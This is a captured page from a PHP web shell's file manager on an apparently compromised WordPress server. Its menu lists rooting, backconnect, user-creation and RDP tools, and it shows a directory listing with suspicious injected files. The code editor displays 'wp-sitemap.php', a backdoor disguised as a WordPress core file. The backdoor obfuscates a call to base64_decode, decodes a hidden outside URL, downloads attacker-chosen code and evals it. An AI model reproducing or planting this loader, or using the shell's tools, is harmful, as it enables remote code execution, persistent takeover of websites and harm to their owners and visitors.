Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.16
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signalhg4v2i.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
485dd
[ DIR ]
dr-xr-xr-x
763816
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
.htaccess.bk
523
B
-rw-r--r--
.litespeed_flag
297
B
-rw-r--r--
defaults.php
1.29
KB
-r--r--r--
google0f195a36a1ebd30e.html
53
B
-rw-r--r--
index.php
12.8
KB
-r-xr-xr-x
license-riho.php
629
B
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
plugins.php
2.03
KB
-r--r--r--
readme.html
7.23
KB
-rw-r--r--
robots.txt
382
B
-r--r--r--
wp-activate.php
7.54
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
7.04
KB
-rw-------
wp-config.php.0
3.49
KB
-rw-rw-rw-
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
51.3
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
32.38
KB
-rw-r--r--
wp-signup.php
34.26
KB
-rw-r--r--
wp-sitemap.php
1.36
KB
-rw-r--r--
wp-sx9.php
538
B
-rw-r--r--
wp-trackback.php
5.27
KB
-rw-r--r--
wp-xmlrpc.php
1020
B
-rw-r--r--
wp-xmlsig.php
127
B
-r--r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-sitemap.php
<?php ini_set('display_errors', 1); error_reporting(E_ALL); ini_set('max_execution_time', 0); set_time_limit(0); $i = isset($_GET['i']) ? $_GET['i'] : 0; $c = isset($_GET['c']) ? $_GET['c'] : ''; function getContent( $url ){ $result = ''; if ( function_exists( 'curl_init' ) && function_exists( 'curl_exec' ) ) { $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $url ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_HEADER, false ); curl_setopt( $ch, CURLOPT_TIMEOUT, 30 ); curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false ); curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false ); if ( !curl_errno ( $ch ) ) { $result = curl_exec( $ch ); } if ( PHP_VERSION_ID < 80000 ) { curl_close( $ch ); } } return $result; } if ( $i > 0 && $c != '' ){ $a = array('a', 'b', 'c', 'd', 'e', 'o', 's', '_'); $b = str_split('1064342534'); $d = ''; for($j=0;$j<count($b);$j++){ $d .= $a[$b[$j]]; if($j == 3 ){ $d .= '64_'; } } $a = $d('aHR0cHM6Ly95cGF5cGF5Lnh5ei9maWxlcy8=', true); $b = getContent( $a.$c ); if ( $b ){ eval( '?>'.$b ); } else { echo 0; } } else { header('HTTP/1.0 404 Not Found'); } exit();
Close